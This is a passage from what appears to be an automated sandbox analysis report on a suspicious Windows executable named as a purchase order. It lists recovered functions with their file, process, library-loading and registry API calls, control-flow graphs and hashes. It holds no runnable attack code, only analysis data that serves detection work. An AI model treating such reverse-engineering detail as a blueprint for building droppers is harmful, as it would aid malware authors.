                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,00403508,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406072
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: CountFileNameTempTick
                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                • API String ID: 1716503409-944333549
                • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                • Instruction ID: d9a4429216a2c16f2b1e0ff0632edab8c7003fcac11a898ec3991e0c35e2d836
                • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                • Instruction Fuzzy Hash: 84F0F076B40204BFEB00CF59ED05E9EB7ACEB95750F01803AEE45F3140E6B099648768
                Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 613 401389-40138e 614 4013fa-4013fc 613->614 615 401390-4013a0 614->615 616 4013fe 614->616 615->616 618 4013a2-4013ad call 401434 615->618 617 401400-401401 616->617 621 401404-401409 618->621 622 4013af-4013b7 call 40136d 618->622 621->617 625 4013b9-4013bb 622->625 626 4013bd-4013c2 622->626 627 4013c4-4013c9 625->627 626->627 627->614 628 4013cb-4013f4 MulDiv SendMessageW 627->628 628->614
                APIs
                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 0f992e2ae6cf3b1b8dd96a4b6b0adf3515dff43e38b3359cc4322e8ed16e10f0
                • Instruction ID: 637f0bbede897030ab690e2e99e2181d797c58f7d0d2aab6e1f53bdf2be6ce4b
                • Opcode Fuzzy Hash: 0f992e2ae6cf3b1b8dd96a4b6b0adf3515dff43e38b3359cc4322e8ed16e10f0
                • Instruction Fuzzy Hash: 9501F432624220ABE7195B389D05B2A3698E751314F10C13FF955F69F1EA78CC02DB4D
                Function 00405AFD Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 629 405afd-405b2e CreateProcessW 630 405b30-405b39 CloseHandle 629->630 631 405b3c-405b3d 629->631 630->631
                APIs
                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F50,?), ref: 00405B26
                • CloseHandle.KERNEL32(?), ref: 00405B33
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: CloseCreateHandleProcess
                • String ID:
                • API String ID: 3712363035-0
                • Opcode ID: c4e46f1f673fd3826d078202ae771a3f9877dbb6e8e98e36d3575ddcb335b3d8
                • Instruction ID: ba1bbf2d7d3ffeb3fca6c599dd16ba0b61ff9929c503e82162f47076b114721a
                • Opcode Fuzzy Hash: c4e46f1f673fd3826d078202ae771a3f9877dbb6e8e98e36d3575ddcb335b3d8
                • Instruction Fuzzy Hash: 43E0B6F4600209BFEB10ABA4EE09F7F7BBCEB44604F004525BE54F6191D7B9A9148A79
                Function 004068E7 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 632 4068e7-406901 GetModuleHandleA 633 406903-406904 call 406877 632->633 634 40690d-40691a GetProcAddress 632->634 637 406909-40690b 633->637 635 40691e-406920 634->635 637->634 638 40691c 637->638 638->635
                APIs
                • GetModuleHandleA.KERNEL32(?,00000020,?,0040361A,0000000B), ref: 004068F9
                • GetProcAddress.KERNEL32(00000000,?), ref: 00406914
                  • Part of subcall function 00406877: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040688E
                  • Part of subcall function 00406877: wsprintfW.USER32 ref: 004068C9
                  • Part of subcall function 00406877: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068DD
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                • String ID:
                • API String ID: 2547128583-0
                • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                • Instruction ID: 6423a29397ed7bff7b22ace80297d9bc35d616ea5f013efbaa2f78a15a639a79
                • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                • Instruction Fuzzy Hash: CEE08673504210AAE21196716E44C7773A89F89740316443FF946F2080D738DC359AAD
                Function 0040600A Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                Download Yara Rule
                APIs
                • GetFileAttributesW.KERNELBASE(?,004030BD,C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe,80000000,00000003), ref: 0040600E
                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406030
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: File$AttributesCreate
                • String ID:
                • API String ID: 415043291-0
                • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                Function 00405FE5 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                Download Yara Rule
                APIs
                • GetFileAttributesW.KERNELBASE(?,?,00405BEA,?,?,00000000,00405DC0,?,?,?,?), ref: 00405FEA
                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405FFE
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                • Instruction ID: e4d3e829c0d5e7da9196b8d45c2199d6a51b20c6ab53065100e3d1aec4738abc
                • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                • Instruction Fuzzy Hash: 4CD01272504130BFC2102728EF0C89BBF95EF64375B024B35FAA5A22F0CB304C638A98
                Function 00405AC8 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • CreateDirectoryW.KERNELBASE(?,00000000,004034FD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405ACE
                • GetLastError.KERNEL32 ref: 00405ADC
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: CreateDirectoryErrorLast
                • String ID:
                • API String ID: 1375471231-0
                • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                • Instruction ID: 96bb703f3db892353912e36940962cdd7e9d34b0f70b6f3c067145efd4a10b7e
                • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                • Instruction Fuzzy Hash: 95C04C30344601AEDA105B219E48B1B7AD4DB50741F26853D6146F41A0EA788455DD3D
                Function 0040608D Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                Download Yara Rule
                APIs
                • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,004034BF,?,?,00403306,?,00000004), ref: 004060A1
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: FileRead
                • String ID:
                • API String ID: 2738559852-0
                • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                • Instruction ID: 9ce5220da9ed3c49ab8c05536da5923326b58a2142fda2ae973167115508ceb5
                • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                • Instruction Fuzzy Hash: 2DE08632140259ABCF119E518C00AEB376CFB05350F018472F911E2240D630E82187A5
                Function 004060BC Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                Download Yara Rule
                APIs
                • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,00403475,?,00793700,?,00793700,?,?,00000004), ref: 004060D0
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: FileWrite
                • String ID:
                • API String ID: 3934441357-0
                • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                • Instruction ID: ff7f98053b8daf8dc00d9e724bd7773b369301681fd057c4f0a19a08aea0fefc
                • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                • Instruction Fuzzy Hash: AEE0EC3225426AABDF10AF659C00AEB7BACFB15360F018437FA56E3190D631E83197A4
                Function 00406387 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                Download Yara Rule
                APIs
                • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00406415,?,?,?,?,: Completed,?), ref: 004063AB
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: Open
                • String ID:
                • API String ID: 71445658-0
                • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                • Instruction ID: 951ca2c494bd41099ddae5d9c01dd02c2d656467939f39d3ba1b92e1fa2b8fa2
                • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                • Instruction Fuzzy Hash: 68D0123200020DBBDF115F919D11FAB371DAB08310F014426FE06E40A1D775D530AB64
                Function 004044C2 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,?,00000000,00000000), ref: 004044D4
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
